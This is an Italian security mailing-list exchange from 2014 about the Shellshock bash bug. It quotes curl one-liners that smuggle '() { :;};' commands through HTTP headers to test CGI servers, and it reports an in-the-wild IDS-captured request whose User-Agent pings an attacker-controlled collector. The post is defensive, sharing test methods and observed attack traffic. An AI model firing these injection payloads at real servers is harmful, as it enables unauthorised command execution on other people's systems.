Il 25/09/2014 11:51, kionez ha scritto:
> A quanto pare in alcuni casi � sufficiente passare un qualsiasi header
> fatto ad-hoc per testare la vulnerabilit�, ad esempio con un banale:
> 
> $ curl -i -X GET "http://www.hostvulnerabile.it/cgi-bin/test.cgi"; -A '()
> { :;}; echo "Warning: Server Vulnerable"'
> 
> oppure con un classico:
> 
> $ curl -i -X GET "http://www.hostvulnerabile.it/cgi-bin/test.cgi"; -H
> 'X-Custom: () { :;}; touch /tmp/vuln; echo "Warning: Server Vulnerable"'

Da noi è già arrivato un drone che esegue

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0{0D}{0A}
User-Agent: () { :;}; /bin/ping -c 1 192.168.0.1{0D}{0A}
Accept: */*{0D}{0A}
{0D}{0A}

(sessione ricostruita con l'IDS, con 192.168.0.1 sostituisco l'indirizzo
reale del collettore dell'attaccante)

Jan
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List

Rispondere a